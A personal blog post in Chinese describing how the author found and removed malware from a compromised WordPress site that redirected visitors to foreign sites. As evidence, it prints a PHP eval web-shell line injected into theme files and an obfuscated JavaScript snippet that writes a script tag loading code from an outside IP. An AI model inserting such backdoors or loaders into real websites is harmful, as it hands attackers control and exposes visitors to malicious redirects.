我的博客,在5月份初时候,就发现网站被挂马,访问网站,跳转到国外其他网站。这几天有空来除了这个问题。
登陆云服务器,发现安全警告,发现木马文件134个,明白是网页文件被木马感染篡改了。需要恢复网页文件。
登陆FTP,发现wordpress主题目录wp-content/themes下,凭空多出现几个主题。如下图。
删除这些木马文件夹及其文件。
因为我正在使用的frontpen文件夹下面的文件已经被篡改。许多网页文件顶部被恶意添加代码,如下:
<?php @eval($_POST['dd']);?><?php @eval($_POST['dd']);?>
<?php @eval($_POST['dd']);?><?php @eval($_POST['dd']);?>
<?php @eval($_POST['dd']);?><?php @eval($_POST['dd']);?>
<?php @eval($_POST['dd']);?>
处理办法:
删除现在主题目录下的左右文件,将原来备份的主题文件恢复到云服务器上。
加强管理员密码 。
不幸的是,第二天网站还是有跳转到国外网站的现象。再想办法解决木马问题。
排查木马文件小技巧:
将服务器上的所有网页文件打包下载到本地,本地打开电脑管家,会自动检测下载后的解压后的文件,若有病毒的话就会有提示的,如下图。
最后将服务器文件下载到本地,被电脑管家识别出为木马文件,再仔细查看多为JS文件,再JS文件最后被恶意添加木马代码:
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))
腾讯云,安装主机安全客户端?
[install succ] at time:[Tue May 23 23:48:54 CST 2017]
dir:[/usr/local/sa/agent]
pack:[agent.tgz]
-------------------------------------------------------------------------------
[RESULT] sec-agent install OK
最后,我在重新安装WP,还原模板和相关网页文件,恢复数据库。至此网站的挂马处理完毕。
- 我的微信
- 这是我的微信扫一扫
- 我的微信公众号
- 我的微信公众号扫一扫